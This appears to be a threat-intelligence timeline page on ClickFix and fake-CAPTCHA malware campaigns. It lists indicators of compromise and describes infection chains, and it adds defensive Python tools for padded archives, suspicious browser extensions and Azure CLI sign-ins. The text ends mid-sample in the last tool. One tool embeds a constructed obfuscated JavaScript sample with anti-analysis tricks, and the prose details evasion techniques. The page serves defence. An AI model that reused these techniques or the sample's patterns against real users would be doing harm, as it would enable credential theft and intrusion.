UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages
Summary
Microsoft has disclosed a new DNS-based variant of the ClickFix social engineering attack, while CTM360 reports an active campaign abusing Google Groups and Google-hosted infrastructure to distribute **Lumma Stealer** and a trojanized Chromium-based browser named *Ninja Browser*. The Google Groups campaign embeds organization-specific keywords into posts to lure victims into downloading oversized (950MB) password-protected archives or trojanized browsers, leveraging URL shorteners and Google Docs/Drive redirectors to evade detection. The Windows payload deploys Lumma Stealer via AutoIt-compiled executables, exfiltrating credentials and session cookies to C2 domains like `healgeni[.]live`. Linux targets receive *Ninja Browser*, which silently installs malicious extensions (e.g., *NinjaBrowserMonetisation*) capable of tracking, script injection, and remote command execution, while maintaining persistence through scheduled tasks. Earlier phases of this broader ClickFix ecosystem included DNS-based staging via `nslookup` to retrieve ModeloRAT, CastleLoader-driven Lumma Stealer surges, and macOS-focused campaigns delivering Odyssey Stealer. The evolution now integrates **trusted platform abuse** (Google Groups, DNS, blockchain), **cross-platform targeting** (Windows/Linux/macOS), and **multi-stage loaders** (AutoIt, Python, VBScript) to maximize evasion. Threat actors continue refining tradecraft, blending social engineering with technical evasion—such as oversized archives, obfuscated extensions, and SaaS infrastructure—to bypass security controls and maintain persistence despite 2025 law enforcement disruptions.
Timeline
- 15.02.2026 18:30 · 1 article
Google Groups campaign distributes Lumma Stealer and Ninja Browser via weaponized SaaS infrastructure
CTM360 reports an active malware campaign abusing **over 4,000 malicious Google Groups** and **3,500 Google-hosted URLs** to distribute **Lumma Stealer** (Windows) and a trojanized Chromium-based browser named *Ninja Browser* (Linux). The attack chain begins with **social engineering in Google Groups**, where threat actors infiltrate industry forums to post technical discussions embedding malicious download links (e.g., "Download {Organization_Name} for Windows 10").

**Windows Infection Flow:**
- Victims receive a **950MB password-protected archive** padded with null bytes to evade antivirus file-size thresholds.
- The archive decompresses to ~33MB, launching an **AutoIt-compiled executable** that reassembles segmented binaries and decrypts a **memory-resident Lumma Stealer payload**.
- Observed behaviors include browser credential exfiltration, session cookie harvesting, shell command execution, and HTTP POST requests to C2 infrastructure (e.g., `healgeni[.]live`) using `multipart/form-data` to mask exfiltrated content.

**Linux Infection Flow:**
- Victims are redirected to download *Ninja Browser*, a trojanized Chromium fork marketed as privacy-focused.
- The browser silently installs the *NinjaBrowserMonetisation* extension, which:
  - Tracks users via **unique identifiers**.
  - Injects scripts and manipulates **browser tabs/cookies**.
  - Uses **heavily obfuscated JavaScript** (XOR/Base56-like encoding).
  - Polls attacker-controlled servers daily via **scheduled tasks** for silent updates.
  - Defaults to a **Russian-based search engine** (*X-Finder*) and redirects to suspicious AI-themed pages.

**Infrastructure & Evasion:**
- Abuses **Google’s trusted ecosystem** (Groups, Docs, Drive redirectors) to bypass filtering, and uses URL shorteners to evade detection.
- Linked to IPs **152.42.139[.]18**, **89.111.170[.]100**, and domains like `ninja-browser[.]com` and `nbdownload[.]space`.
- Represents a broader trend of **SaaS platform weaponization**, where attackers exploit legitimate services to host and distribute malware while evading traditional defenses.

**Defensive Recommendations:**
- Inspect **shortened URLs** and **Google Docs/Drive redirect chains**.
- Block IoCs at **firewall/EDR levels** and monitor for **scheduled task creation**.
- Educate users against downloading software from **public forums** without verification.
- Audit **browser extension installations** for unauthorized or obfuscated components.
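The 950MB archive in this campaign owes its size to null-byte padding; the real content is roughly 33MB. A cheap triage check for oversized downloads is to measure how much of the file is trailing zero bytes, which recovers the effective size and flags padding meant to exceed scanner size limits. The following is an added example, not code from CTM360's report; the thresholds, the backwards chunked read and the sample file are my own choices and the sample is constructed.

```python
"""Triage check for null-byte-padded files.

Added example (not from CTM360's report). A file inflated with trailing
zeros to beat AV/sandbox size limits has a large total size but a small
"effective" size, which this check recovers. Thresholds are assumptions.
"""
import os
import tempfile

PADDING_RATIO_THRESHOLD = 0.90    # assumed: >=90% trailing zeros is suspicious
MIN_SIZE = 50 * 1024 * 1024       # assumed: only files of 50 MiB or more matter
CHUNK = 1 << 20                   # read 1 MiB at a time when scanning a file


def trailing_zero_padding(data: bytes) -> int:
    """Number of zero bytes at the end of an in-memory blob."""
    return len(data) - len(data.rstrip(b"\x00"))


def build_report(total: int, padding: int, min_size: int) -> dict:
    ratio = padding / total if total else 0.0
    return {
        "total_size": total,
        "padding_bytes": padding,
        "effective_size": total - padding,
        "padding_ratio": ratio,
        "suspicious": total >= min_size and ratio >= PADDING_RATIO_THRESHOLD,
    }


def analyze_bytes(data: bytes, min_size: int = MIN_SIZE) -> dict:
    return build_report(len(data), trailing_zero_padding(data), min_size)


def analyze_file(path: str, min_size: int = MIN_SIZE) -> dict:
    """Same check for a file on disk. Reads backwards from the end, so a
    multi-hundred-megabyte padded file costs only a handful of reads."""
    total = os.path.getsize(path)
    padding = 0
    with open(path, "rb") as fh:
        pos = total
        while pos > 0:
            n = min(CHUNK, pos)
            pos -= n
            fh.seek(pos)
            block = fh.read(n)
            kept = len(block.rstrip(b"\x00"))
            padding += n - kept
            if kept:              # found the last non-zero byte, stop scanning
                break
    return build_report(total, padding, min_size)


def demo_file_check() -> dict:
    """Write a constructed sample (16 KiB of content followed by 3 MiB of
    zeros) to a temp file and run the on-disk check with the size floor
    lowered so the small sample is evaluated."""
    content = bytes(range(256)) * 64
    sample = content + b"\x00" * (3 * CHUNK)
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(sample)
        path = tmp.name
    try:
        return analyze_file(path, min_size=0)
    finally:
        os.remove(path)


if __name__ == "__main__":
    print(demo_file_check())
```

A ZIP archive ends with its end-of-central-directory record, so a legitimate archive almost never carries a long zero tail; disk images and sparse files do, which is why the result is a triage signal rather than a verdict.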
Sources
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
- 15.02.2026 16:10 · 1 article
DNS-based ClickFix variant uses nslookup for malware staging
Microsoft disclosed a new DNS-based ClickFix variant that abuses the `nslookup` command to stage and execute malware payloads. The attack begins with a command executed via the Windows Run dialog, performing a DNS lookup against a hard-coded external server to extract a `Name:` response, which is then executed as the second-stage payload. This technique uses DNS as a lightweight staging or signaling channel, blending malicious activity with normal network traffic and adding a validation layer before payload execution. The attack chain downloads a ZIP archive from the domain `azwsappdev[.]com`, extracts a malicious Python script to conduct reconnaissance and run discovery commands, and drops a VBScript responsible for launching **ModeloRAT**, a Python-based remote access trojan. Persistence is established by creating an LNK file in the Windows Startup folder, ensuring the malware runs at each system boot. The disclosure coincides with a surge in **Lumma Stealer** activity, driven by ClickFix-style fake CAPTCHA campaigns deploying **CastleLoader**, an AutoIt-based malware loader. CastleLoader checks for virtualization and security software before decrypting and launching Lumma Stealer in memory, with infections predominantly observed in India, France, and the U.S. Campaigns also distribute fake NSIS installers and VBA scripts, using scheduled tasks for persistence. One CastleLoader domain (`testdomain123123[.]shop`) was identified as a Lumma Stealer C2, suggesting potential collaboration or shared infrastructure between the operators. Additionally, macOS-focused ClickFix campaigns are delivering **Odyssey Stealer** (a rebrand of Poseidon Stealer), which targets cryptocurrency wallets and functions as a full RAT with SOCKS5 proxy capabilities. 
A **ClearFake** campaign leverages fake CAPTCHA lures on compromised WordPress sites to execute an HTA file and deploy Lumma Stealer, alongside **EtherHiding**—a technique using BNB Smart Chain contracts to fetch payloads from GitHub, blending malicious traffic with legitimate Web3 activity. The article underscores the growing sophistication of ClickFix, now incorporating DNS staging, multi-platform loaders, and blockchain-based evasion techniques to maintain resilience against takedown efforts.
Sources
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
- 27.01.2026 16:38 · 1 article
New ClickFix campaign abuses SyncAppvPublishingServer.vbs to distribute Amatera Stealer
The new campaign abuses SyncAppvPublishingServer.vbs, a signed Visual Basic Script associated with App-V, to retrieve and execute an in-memory loader from an external server using wscript.exe. A fake CAPTCHA verification prompt tricks users into pasting and executing a malicious command in the Windows Run dialog. The obfuscated loader runs checks to ensure it is not executing inside a sandboxed environment, then fetches configuration data from a public Google Calendar (ICS) file, turning a trusted third-party service into a dead drop resolver. The campaign retrieves additional loader stages, including a PowerShell script that functions as an intermediate loader to execute the next stage directly in memory. The resulting script is decrypted, GZip-decompressed in memory, and run using Invoke-Expression, ultimately culminating in a shellcode loader that launches Amatera Stealer. The campaign targets enterprise-managed systems, as App-V is built only into the Enterprise and Education editions of Windows 10 and Windows 11, along with modern Windows Server versions. It is highly sophisticated and evasive, using in-memory PowerShell execution and relying on blockchain and popular CDNs so that it never communicates with infrastructure that is not a legitimate service. The campaign is part of the broader fake CAPTCHA ecosystem, which uses trusted web infrastructure as the delivery surface, with Cloudflare-style challenges acting as a conduit for clipboard-driven execution of PowerShell commands, VB Scripts, MSI installers, and browser-native frameworks like Matrix Push C2.
Sources
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- 19.01.2026 11:09 · 2 articles
CrashFix campaign delivers ModeloRAT via malicious Chrome extension
A new campaign codenamed CrashFix uses a malicious Chrome extension to deliver ModeloRAT via ClickFix-style browser crash lures. The campaign, tracked as KongTuke, uses a malicious Chrome extension named 'NexShield – Advanced Web Guardian' to crash the browser and trick victims into executing commands. The extension masquerades as a legitimate ad blocker and claims to protect users against ads, trackers, malware, and intrusive content. The extension was downloaded at least 5,000 times and is a near-identical clone of uBlock Origin Lite. The extension displays a fake security warning claiming the browser had 'stopped abnormally' and prompts users to run a 'scan'. The scan presents a bogus security alert instructing victims to open the Windows Run dialog and execute a command copied to the clipboard. Executing the command causes the browser to freeze and crash by launching a denial-of-service (DoS) attack that creates new runtime port connections through an infinite loop. The extension transmits a unique ID to an attacker-controlled server, allowing operators to track victims. The extension uses a delayed execution mechanism, triggering malicious behavior 60 minutes after installation and then every 10 minutes. The extension incorporates anti-analysis techniques to disable right-click context menus and prevent the use of developer tools. The CrashFix command employs the legitimate Windows utility, finger.exe, to retrieve and execute the next-stage payload from the attacker's server. The payload is a PowerShell command that retrieves a secondary PowerShell script, which uses multiple layers of Base64 encoding and XOR operations to conceal the next-stage malware. The decrypted blob scans running processes for over 50 analysis tools and virtual machine indicators, ceasing execution if found. 
The script checks whether the machine is domain-joined or standalone and sends an HTTP POST request to the server containing a list of installed antivirus products and a flag indicating the machine type. For domain-joined machines, the campaign deploys ModeloRAT, a fully-featured Python-based Windows RAT that uses RC4 encryption for C2 communications. ModeloRAT sets up persistence through the Registry and can execute binaries, DLLs, Python scripts, and PowerShell commands. It is equipped to update or terminate itself upon receiving specific commands and implements varied beaconing logic to avoid detection. For standalone workstations, the campaign ends with the C2 server responding with a test payload message, indicating it may still be in the testing phase. KongTuke's CrashFix campaign demonstrates how threat actors evolve their social engineering tactics by impersonating trusted projects and exploiting user frustration. Huntress attributes the analyzed CrashFix attack to a threat actor named 'KongTuke', whose operations have been on the company's radar since early 2025. Based on the recent discovery, the researchers believe that KongTuke is evolving and becoming more interested in enterprise networks, which are more lucrative for cybercriminals. Falling for ClickFix attacks can be prevented by making sure that the effect of any external command executed on the system is well understood. Furthermore, installing browser extensions only from trusted publishers or sources should keep users safe from CrashFix and similar threats. Users who installed NexShield should perform a full system cleanup, as uninstalling the extension does not remove all payloads, such as ModeloRAT or other malicious scripts.
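The NexShield extension above and the NinjaBrowserMonetisation extension in the Google Groups entry share a profile: broad permissions, XOR/Base64-style encoding of their logic, blocking of the context menu and developer tools, and timer-driven execution (60 minutes after install, then every 10 minutes, in the CrashFix case). An extension audit can score those traits statically. The code below is an added example, not Huntress's or CTM360's tooling and not the real extension code; the permission list, the regexes, the entropy threshold and the score weights are my assumptions, and both sample extensions are constructed.

```python
"""Static triage of a browser extension's manifest and scripts.

Added example (not from Huntress or CTM360). Reports broad permissions,
obfuscation traits, anti-analysis handlers and scheduled execution so an
analyst can prioritise review. Lists, regexes and weights are assumptions.
"""
import json
import math
import re
from collections import Counter

RISKY_PERMISSIONS = {"cookies", "webRequest", "webRequestBlocking", "tabs",
                     "scripting", "alarms", "nativeMessaging", "debugger"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Source-level traits; each key becomes an indicator name in the report.
INDICATORS = {
    "dynamic_code":        re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "char_decoding":       re.compile(r"String\.fromCharCode|\batob\s*\("),
    "xor_decode_loop":     re.compile(r"charCodeAt\([^)]*\)\s*\^"),
    "context_menu_block":  re.compile(r"['\"]contextmenu['\"]"),
    "devtools_key_block":  re.compile(r"keyCode\s*===?\s*123|['\"]F12['\"]"),
    "scheduled_execution": re.compile(r"alarms\.create\s*\(|setInterval\s*\("),
}
MIN_LITERAL_LEN = 40       # assumed: shorter strings are not worth scoring
ENTROPY_THRESHOLD = 4.0    # assumed bits/char; encoded blobs sit well above it


def shannon_entropy(text: str) -> float:
    """Bits per character of `text`; 0.0 for empty or single-symbol input."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def string_literals(source: str) -> list:
    """Small scanner for quoted literals that honours backslash escapes.
    Triage-grade: comments and regex literals can confuse it."""
    literals, i, n = [], 0, len(source)
    while i < n:
        q = source[i]
        if q in "'\"`":
            j, buf = i + 1, []
            while j < n and source[j] != q and source[j] != "\n":
                if source[j] == "\\" and j + 1 < n:
                    j += 1                       # keep the escaped character
                buf.append(source[j])
                j += 1
            literals.append("".join(buf))
            i = j + 1
        else:
            i += 1
    return literals


def script_indicators(source: str) -> list:
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    if any(len(lit) >= MIN_LITERAL_LEN and shannon_entropy(lit) >= ENTROPY_THRESHOLD
           for lit in string_literals(source)):
        hits.append("high_entropy_literal")
    return hits


def audit_extension(manifest: dict, scripts: dict) -> dict:
    perms = set(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", [])) | perms  # MV2 lists hosts under permissions
    report = {
        "name": manifest.get("name"),
        "risky_permissions": sorted(perms & RISKY_PERMISSIONS),
        "broad_hosts": sorted(hosts & BROAD_HOSTS),
        "indicators": {name: script_indicators(src) for name, src in scripts.items()},
    }
    report["score"] = (len(report["risky_permissions"]) + 2 * len(report["broad_hosts"])
                       + 2 * sum(len(v) for v in report["indicators"].values()))
    return report


# Constructed samples: a CrashFix-like profile and a harmless notes extension.
SUSPICIOUS_MANIFEST = {
    "manifest_version": 3, "name": "Example Web Guardian",
    "permissions": ["tabs", "cookies", "webRequest", "alarms", "storage"],
    "host_permissions": ["<all_urls>"], "background": {"service_worker": "bg.js"},
}
SUSPICIOUS_SCRIPTS = {"bg.js": r'''
const k = 0x5a;
const d = s => s.split("").map(c => String.fromCharCode(c.charCodeAt(0) ^ k)).join("");
chrome.alarms.create("sync", { delayInMinutes: 60, periodInMinutes: 10 });
document.addEventListener("contextmenu", e => e.preventDefault());
document.addEventListener("keydown", e => { if (e.keyCode === 123) e.preventDefault(); });
const blob = "qL8vZ2kP9xW1mT4nR7cY0bD3eF5gH6jK2aS8uV1oI9pA3zX7wQ4yE6rN0tB5";
eval(d(atob(blob)));
'''}
BENIGN_MANIFEST = {"manifest_version": 3, "name": "Example Notes", "permissions": ["storage"]}
BENIGN_SCRIPTS = {"popup.js": 'chrome.storage.local.get("notes", r => render(r.notes || []));'}

if __name__ == "__main__":
    print(json.dumps(audit_extension(SUSPICIOUS_MANIFEST, SUSPICIOUS_SCRIPTS), indent=2))
```

Pointing `audit_extension` at the manifest and scripts of an unpacked extension directory (for Chrome, under the profile's `Extensions` folder) gives a per-file indicator list; a non-zero score is a reason to read the code, not proof of malice, since ad blockers legitimately need `webRequest` and broad host access.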
Sources
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- 17.11.2025 18:53 · 3 articles
EVALUSION ClickFix campaign delivers Amatera Stealer and NetSupport RAT
A new EVALUSION ClickFix campaign has been discovered, delivering Amatera Stealer and NetSupport RAT. Amatera Stealer, an evolution of ACR Stealer, is available under a malware-as-a-service (MaaS) model and targets crypto-wallets, browsers, messaging applications, FTP clients, and email services. It employs advanced evasion techniques such as WoW64 SysCalls and is packed using PureCrypter. The stealer is injected into the MSBuild.exe process to harvest sensitive data and contact an external server to execute a PowerShell command to fetch and run NetSupport RAT. The campaign also involves phishing attacks using various malware families and phishing kits named Cephas and Tycoon 2FA. Tycoon 2FA is a phishing kit that bypasses multi-factor authentication (MFA) and authentication apps by intercepting usernames, passwords, session cookies, and MFA flows in real-time. It has been used in over 64,000 attacks this year, primarily targeting Microsoft 365 and Gmail. The kit includes anti-detection layers and can lead to total session takeover, allowing attackers to move laterally into various enterprise systems. Legacy MFA methods like SMS codes, push notifications, and TOTP apps are vulnerable to Tycoon 2FA due to their reliance on user behavior. Criminal groups such as Scattered Spider, Octo Tempest, and Storm 1167 are using Tycoon 2FA daily. Phishing-proof MFA solutions, such as Token Ring and Token BioStick, use biometric authentication, proximity-based checks, and domain binding to prevent phishing attacks. Token Ring and Token BioStick solutions are inexpensive, available today, and provide a better user experience with faster authentication times.
Sources
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- 17.09.2025 17:01 · 2 articles
MetaStealer attack uses fake Cloudflare Turnstile and MSI package
The MetaStealer attack, a variant of the ClickFix family, uses a fake Cloudflare Turnstile lure and an MSI package disguised as a PDF to deploy the MetaStealer infostealer malware. The attack involves a multi-stage infection chain that includes a DLL sideloading technique using a legitimate SentinelOne executable. The MetaStealer attack targets crypto wallets and other sensitive information, using a combination of social engineering and technical evasion techniques to deploy malware.
Sources
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- 16.09.2025 15:00 · 9 articles
FileFix attack impersonates Meta and deploys StealC infostealer
A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader. The campaign exploits Blender's Auto Run feature to execute embedded Python scripts that fetch a malware loader from a Cloudflare Workers domain. The loader then retrieves a PowerShell script that downloads two ZIP archives, which unpack into the %TEMP% folder and drop LNK files in the Startup directory for persistence. The campaign deploys two payloads: the StealC infostealer and an auxiliary Python stealer. The StealC malware used in this campaign is the latest variant of the second major version, with expanded data-stealing capabilities and support for exfiltration from various browsers, cryptocurrency wallets, messaging apps, VPN clients, and mail clients. Despite being documented since 2023, the malware remains elusive to anti-virus products, with no security engine on VirusTotal detecting the analyzed variant. The campaign has been active for at least six months, involving the implantation of malicious .blend files on platforms like CGTrader. The attack chains involve uploading malicious .blend files containing a malicious "Rig_Ui.py" script, which is executed as soon as the files are opened with Blender's Auto Run feature enabled. The Rig_Ui.py script fetches a PowerShell script to download two ZIP archives, one of which contains a payload for StealC V2, while the second archive deploys a secondary Python-based stealer on the compromised host. The updated version of StealC supports a wide range of information gathering features, allowing data to be extracted from various browsers, web plugins, cryptocurrency wallet apps, messaging services, VPNs, and email clients. 
The campaign shares similarities with a prior campaign linked to Russian-speaking threat actors that impersonated the Electronic Frontier Foundation (EFF) to target the online gaming community and infect them with StealC and Pyramid C2. Blender's documentation acknowledges the security risk posed by the ability to include Python scripts within blend-files, which can execute arbitrary Python code. Cybersecurity researchers have disclosed a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC information stealer. By exploiting this vulnerability, researchers gathered system fingerprints, monitored active sessions, and stole cookies from the StealC control panel. StealC, which first emerged in January 2023 under a malware-as-a-service (MaaS) model, has been distributed via YouTube as part of a campaign known as the YouTube Ghost Network. The malware has also been propagated via rogue Blender Foundation files and a social engineering tactic known as FileFix. StealC has received updates, including Telegram bot integration for notifications, enhanced payload delivery, and a redesigned panel, codenamed StealC V2. The source code for the StealC administration panel was leaked, providing insights into the threat actor's operations. A StealC customer named YouTubeTA used Google's video-sharing platform to distribute the stealer by advertising cracked versions of Adobe Photoshop and Adobe After Effects, amassing over 5,000 logs containing 390,000 stolen passwords and more than 30 million stolen cookies. YouTubeTA is suspected of seizing control of legitimate YouTube accounts to promote cracked software and of using ClickFix-like fake CAPTCHA lures to distribute StealC. The StealC panel allows operators to create multiple users and differentiate between admin users and regular users. YouTubeTA operated from an Eastern European country where Russian is commonly spoken, using an Apple M3 processor-based machine.
An operational security blunder revealed YouTubeTA's real IP address, associated with a Ukrainian provider called TRK Cable TV. The StealC developers exhibited weaknesses in cookie security and panel code quality, allowing researchers to gather data about their customers.
Sources
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- 21.08.2025 19:25 · 14 articles
UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages
The ClickFix attacks now feature videos that guide victims through the self-infection process, a timer to pressure targets into taking risky actions, and automatic detection of the operating system to provide the correct commands. The attacks are primarily promoted through malvertising on Google Search and exploit known flaws in outdated WordPress plugins to compromise legitimate sites. The payloads delivered in these attacks include MSHTA executables, PowerShell scripts, and living-off-the-land binaries.

Additionally, threat actors have been abusing the decades-old Finger protocol to retrieve and execute remote commands on Windows devices. The Finger protocol is used to deliver commands that create a random-named path, download a zip archive disguised as a PDF, and extract a Python malware package. The Python program is executed using `pythonw.exe __init__.py`, and a callback is made to the attacker's server to confirm execution. A related batch file indicates that the Python package is an infostealer. Another campaign uses the Finger protocol to retrieve and run commands that look for malware research tools and exit if found. If no malware analysis tools are found, the commands download a zip archive disguised as a PDF and extract the NetSupport Manager RAT package. The commands configure a scheduled task to launch the remote access malware when the user logs in.

ClickFix attack variants have been observed using a realistic-looking Windows Update animation in a full-screen browser page to trick users into executing malicious commands. These variants drop the LummaC2 and Rhadamanthys information stealers. The attack uses steganography to encode the final malware payload inside an image: multiple stages of PowerShell code and a .NET assembly (the Stego Loader) reconstruct the final payload, which is embedded in encrypted form inside a PNG file. The shellcode holding the infostealer samples is packed using the Donut tool. The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers back in October, before Operation Endgame took down parts of its infrastructure on November 13.

A new campaign codenamed JackFix leverages fake adult websites (xHamster and PornHub clones) as its phishing mechanism, likely distributed via malvertising. JackFix displays highly convincing fake Windows update screens to get the victim to run malicious code. The attack leans heavily on obfuscation to conceal ClickFix-related code and blocks users from escaping the full-screen alert by disabling the Escape and F11 keys, along with F5 and F12. The initial command executed is an MSHTA payload launched using the legitimate mshta.exe binary; it contains JavaScript that runs a PowerShell command to retrieve another PowerShell script from a remote server. That script attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and the paths where payloads are staged. It serves up to eight different payloads, including Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, and other unspecified loaders and RATs. The threat actor often changes the URI used to host the first mshta.exe stage and has been observed moving the second stage from the domain securitysettings.live to xoiiasdpsdoasdpojas.com, although both point to the same IP address 141.98.80.175.

An initial access broker tracked as Storm-0249 is abusing endpoint detection and response solutions and trusted Microsoft Windows utilities to load malware, establish communication, and gain persistence in preparation for ransomware attacks. The threat actor has moved beyond mass phishing and adopted stealthier, more advanced methods that prove effective and difficult for defenders to counter. In one attack analyzed by researchers at cybersecurity company ReliaQuest, Storm-0249 leveraged SentinelOne EDR components to hide malicious activity. The attack started with ClickFix social engineering that tricked users into pasting and executing curl commands in the Windows Run dialog to download a malicious MSI package with SYSTEM privileges. A malicious PowerShell script is also fetched from a spoofed Microsoft domain and piped straight into memory, never touching the disk and thus evading antivirus detection. The MSI file drops a malicious DLL (SentinelAgentCore.dll), placed strategically alongside the pre-existing, legitimate SentinelAgentWorker.exe that is already installed as part of the victim's SentinelOne EDR. Next, the attacker loads the DLL using the signed SentinelAgentWorker (DLL sideloading), executing the file within the trusted, privileged EDR process and obtaining stealthy persistence that survives operating system updates. Once the attacker gains access, they use the SentinelOne component to collect system identifiers through legitimate Windows utilities like reg.exe and findstr.exe, and to funnel encrypted HTTPS command-and-control (C2) traffic. The compromised systems are profiled using 'MachineGuid', a unique hardware-based identifier that ransomware groups like LockBit and ALPHV use to bind encryption keys to specific victims. The abuse of trusted, signed EDR processes bypasses nearly all traditional monitoring. The researchers recommend that system administrators rely on behavior-based detection that identifies trusted processes loading unsigned DLLs from non-standard paths, and set stricter controls on curl, PowerShell, and LoLBin execution.

A new variation of the ClickFix attack dubbed 'ConsentFix' abuses the Azure CLI OAuth app to hijack Microsoft accounts without needing a password or bypassing multi-factor authentication (MFA). ConsentFix tricks victims into completing the Azure CLI OAuth flow and steals the resulting authorization code, which is exchanged for full account access. The attack starts with victims landing on a compromised, legitimate website that ranks high in Google Search results. Victims are shown a fake Cloudflare Turnstile CAPTCHA widget that asks for a valid business email address, filtering out bots and non-targets. Victims are then instructed to click a 'Sign in' button that opens a legitimate Microsoft URL in a new tab, leading to an Azure login page. The attack completes when victims paste the URL containing the Azure CLI OAuth authorization code into the malicious page, granting attackers access to the Microsoft account via Azure CLI. The attack triggers only once per victim IP address, preventing repeated phishing attempts from the same IP. Defenders are advised to monitor for unusual Azure CLI login activity, such as logins from new IP addresses, and to check for legacy Graph scopes used by attackers to evade detection.

Over the past six months, hackers have increasingly relied on the browser-in-the-browser (BitB) method to trick users into providing Facebook account credentials.
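The ConsentFix advice above, to monitor for Azure CLI logins from new IP addresses and for legacy Graph scopes, can be turned into a simple baseline rule over sign-in log exports. The code below is an added example, not part of the ConsentFix write-up. It assumes a per-record shape modelled on the Microsoft Entra sign-in log (`appId`, `appDisplayName`, `ipAddress`, `resourceId`, `resourceDisplayName`, `userPrincipalName`, `createdDateTime`, and a flattened `errorCode` in place of the nested status object); verify those names against your own export. The Azure CLI application ID and the Azure AD Graph and Microsoft Graph resource IDs are the publicly documented values; the sign-in records are constructed and use TEST-NET addresses.

```python
"""Flag Azure CLI sign-ins from IP addresses a user has never used before.

Added example (not from the ConsentFix report). Builds a per-user IP
baseline from earlier successful sign-ins and alerts on Azure CLI sign-ins
outside it, escalating when the resource is the legacy Azure AD Graph API.
Field names mirror the Entra sign-in export as assumed in the lead-in.
"""
from collections import defaultdict
from datetime import datetime, timezone

AZURE_CLI_APP_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"              # public Azure CLI app ID
LEGACY_AAD_GRAPH_RESOURCE_ID = "00000002-0000-0000-c000-000000000000"  # Azure AD Graph (legacy)
MS_GRAPH_RESOURCE_ID = "00000003-0000-0000-c000-000000000000"          # Microsoft Graph


def parse_time(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def is_azure_cli(record: dict) -> bool:
    return (record.get("appId") == AZURE_CLI_APP_ID
            or record.get("appDisplayName") == "Microsoft Azure CLI")


def build_ip_baseline(records: list, before: datetime) -> dict:
    """user -> set of IPs seen in successful sign-ins (errorCode 0) before `before`."""
    baseline = defaultdict(set)
    for r in records:
        if parse_time(r["createdDateTime"]) < before and r.get("errorCode", 0) == 0:
            baseline[r["userPrincipalName"]].add(r["ipAddress"])
    return baseline


def detect_cli_anomalies(records: list, baseline: dict, since: datetime) -> list:
    """Azure CLI sign-ins at or after `since` from an IP outside the user's baseline."""
    alerts = []
    for r in records:
        if parse_time(r["createdDateTime"]) < since:
            continue
        if not is_azure_cli(r) or r.get("errorCode", 0) != 0:
            continue                          # failed attempts are a separate signal
        user, ip = r["userPrincipalName"], r["ipAddress"]
        if ip in baseline.get(user, set()):
            continue
        legacy = r.get("resourceId") == LEGACY_AAD_GRAPH_RESOURCE_ID
        alerts.append({
            "user": user, "ip": ip, "time": r["createdDateTime"],
            "resource": r.get("resourceDisplayName"),
            "severity": "high" if legacy else "medium",
            "reason": "Azure CLI sign-in from IP outside user's baseline"
                      + (" against legacy Azure AD Graph" if legacy else ""),
        })
    return alerts


def _rec(t, user, app, ip, resource_id, resource_name, error=0):
    """Build one constructed sign-in record in the assumed shape."""
    return {"createdDateTime": t, "userPrincipalName": user, "appDisplayName": app,
            "appId": AZURE_CLI_APP_ID if app == "Microsoft Azure CLI" else None,
            "ipAddress": ip, "resourceId": resource_id,
            "resourceDisplayName": resource_name, "errorCode": error}


SAMPLE_SIGNINS = [  # constructed; 203.0.113.0/24 and 198.51.100.0/24 are TEST-NET ranges
    _rec("2026-02-01T09:00:00Z", "alice@example.com", "Microsoft Teams", "203.0.113.10",
         MS_GRAPH_RESOURCE_ID, "Microsoft Graph"),
    _rec("2026-02-03T10:15:00Z", "alice@example.com", "Microsoft Azure CLI", "203.0.113.10",
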